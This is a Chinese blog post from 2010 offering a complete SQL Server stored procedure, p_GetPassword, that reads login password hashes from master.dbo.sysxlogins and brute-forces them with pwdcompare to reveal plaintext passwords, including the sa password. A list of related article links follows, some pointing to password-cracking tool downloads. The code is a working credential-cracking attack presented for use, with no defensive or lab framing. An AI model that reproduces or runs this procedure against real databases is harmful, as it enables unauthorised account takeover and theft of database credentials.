存储过程实例:SQL Server Sa密码破解

原创 2010年06月01日 14:55:00
一个SQL Server Sa密码破解的存储过程:

if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[p_GetPassword]') and OBJECTPROPERTY(id, N'IsProcedure') = 1)

drop procedure [dbo].[p_GetPassword]

GO

/*--穷举法破解 SQL Server 用户密码

可以破解中文,特殊字符,字符+尾随空格的密码

为了方便显示特殊字符的密码,在显示结果中,显示了组成密码的ASCII

理论上可以破解任意位数的密码

条件是你的电脑配置足够,时间足够

/*--调用示例

exec p_GetPassword

--*/

create proc p_GetPassword

@username sysname=null, --用户名,如果不指定,则列出所有用户

@pwdlen int=2 --要破解的密码的位数,默认是2位及以下的

as

set @pwdlen=case when isnull(@pwdlen,0)<1 then 1 else @pwdlen-1 end

select top 255 id=identity(int,0,1) into #t from syscolumns

alter table #t add constraint PK_#t primary key(id)

select name,password

,type=case when xstatus&2048=2048 then 1 else 0 end

,jm=case when password is null then 1 else 0 end

,pwdstr=cast('' as sysname)

,pwd=cast('' as varchar(8000))

into #pwd

from master.dbo.sysxlogins a

where srvid is null

and name=isnull(@username,name)

declare @s1 varchar(8000),@s2 varchar(8000),@s3 varchar(8000)

declare @l int

select @l=0

,@s1='char(aa.id)'

,@s2='cast(aa.id as varchar)'

,@s3=',#t aa'

exec('

update pwd set jm=1,pwdstr='+@s1+'

,pwd='+@s2+'

from #pwd pwd'+@s3+'

where pwd.jm=0

and pwdcompare('+@s1+',pwd.password,pwd.type)=1

')

while exists(select 1 from #pwd where jm=0 and @l<@pwdlen)

begin

select @l=@l+1

,@s1=@s1+'+char('+char(@l/26+97)+char(@l%26+97)+'.id)'

,@s2=@s2+'+'',''+cast('+char(@l/26+97)+char(@l%26+97)+'.id as varchar)'

,@s3=@s3+',#t '+char(@l/26+97)+char(@l%26+97)

exec('

update pwd set jm=1,pwdstr='+@s1+'

,pwd='+@s2+'

from #pwd pwd'+@s3+'

where pwd.jm=0

and pwdcompare('+@s1+',pwd.password,pwd.type)=1

')

end

select 用户名=name,密码=pwdstr,密码ASCII=pwd

from #pwd

go

sql server 2005忘记sa密码的解决办法

一、在sql server 2005下,从Windows身份验证方式修改为混合身份验证模式步骤如下 1、先使用Windows方式登陆,在 SQL Server Management Studio 的...
  • wjm371002515
  • wjm371002515
  • 2011-10-22 09:22:29
  • 4470

SQL Server 2012修改sa密码的方法

http://wenku.baidu.com/link?url=Y1OkS2SuICy7_mEyNSTLJyi8u2o50c21vwO4LNaeDfqrj43UN7N3BuoTSb388fUPIRTM...
  • u014683488
  • u014683488
  • 2014-11-07 19:29:36
  • 566

SQL数据库密码暴力破解工具改进版

  • 2009年12月17日 10:59
  • 686KB
  • 下载

通过一个实际的例子学习SQLServer存储过程

下面通过一个实际的例子学习SQLServer存储过程。所谓应用而学。 --定义存储过程    CREATE PROCEDURE  xxxxxxxx_p     (    ...
  • beiguofengguang
  • beiguofengguang
  • 2007-11-04 10:51:00
  • 14948

破解Sql Server存储过程加密

  • 2014年08月07日 10:15
  • 13KB
  • 下载

sql server 2005 sa初始密码设置

首先,用windows 身份验证 登陆 sql server 2005 依次展开  安全性->登录名 选中 sa 右键单击 选中 属性 弹出 sa 的属性对话框 就在密码处 改 密码 ...
  • xdruan
  • xdruan
  • 2012-06-13 11:39:39
  • 2468

sql server 2012错误:"用户 sa 登录失败 microsoft sql server,错误:18456"解决方法

本文为大家讲解的是sql server 2012错误:"用户 sa 登录失败 microsoft sql server,错误:18456"的解决方法,感兴趣的同学参考下。 错误描述: 版文...
  • WangQQ491815551
  • WangQQ491815551
  • 2015-04-23 10:16:57
  • 1573

sql server 2008 r2 修改sa密码 通过sql server 身份验证登陆

解决方法如下 通过windows 身份验证登陆后, 首先选中服务器(右键)->属性 ->安全性->服务器身份验证修改为"SQL SERVER和WINDOWS身份验证模式" 其次展开服务器上的"...
  • zhaoyingm
  • zhaoyingm
  • 2013-02-18 17:37:21
  • 19174

SQL Server密码破解工具简介

在对SQL Server系统执行入侵测试或者更高级别的安全审计时,有一种测试不应该被忽略,那就是SQL Server密码测试。这一点看起来显而易见,但是很多人都会忽略它。  密码测试可以帮助检查恶意入...
  • vbangle
  • vbangle
  • 2011-01-17 15:04:00
  • 12194

SQL Server 存储过程示例

--有输入参数的存储过程-- create proc GetComment (@commentid int) as select * from Comment where CommentID=@com...
  • yan309271291
  • yan309271291
  • 2014-08-08 13:34:14
  • 1822
收藏助手
不良信息举报
您举报文章:存储过程实例:SQL Server Sa密码破解
举报原因:
原因补充:

(最多只允许输入30个字)